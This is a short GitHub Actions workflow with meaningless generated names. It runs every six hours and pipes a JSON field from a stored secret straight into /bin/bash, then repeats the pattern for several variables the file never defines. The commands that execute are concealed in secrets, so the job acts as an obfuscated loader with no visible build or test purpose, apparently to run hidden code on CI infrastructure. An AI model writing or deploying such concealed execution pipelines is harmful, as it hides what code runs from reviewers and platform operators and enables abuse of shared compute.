name: gechundan5678

on:
  workflow_dispatch:
  schedule:
    - cron: '9 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gechundan5678
        env:
          dimsh8408: ${{ secrets.dimsh8408 }}
        run: |
          echo $dimsh8408 | jq -r .zbo110 | /bin/bash
          echo $ym00005 | jq -r .yj3404 | /bin/bash
          echo $jf3418 | jq -r .wt60592 | /bin/bash
          echo $udkh33 | jq -r .sv50 | /bin/bash
          echo $kpnn88634 | jq -r .ymgl2 | /bin/bash
          echo $ns8 | jq -r .iqcax613 | /bin/bash
          echo $alp0 | jq -r .w7 | /bin/bash
          echo $bnz630 | jq -r .p84 | /bin/bash
          echo $drml491 | jq -r .gd261 | /bin/bash

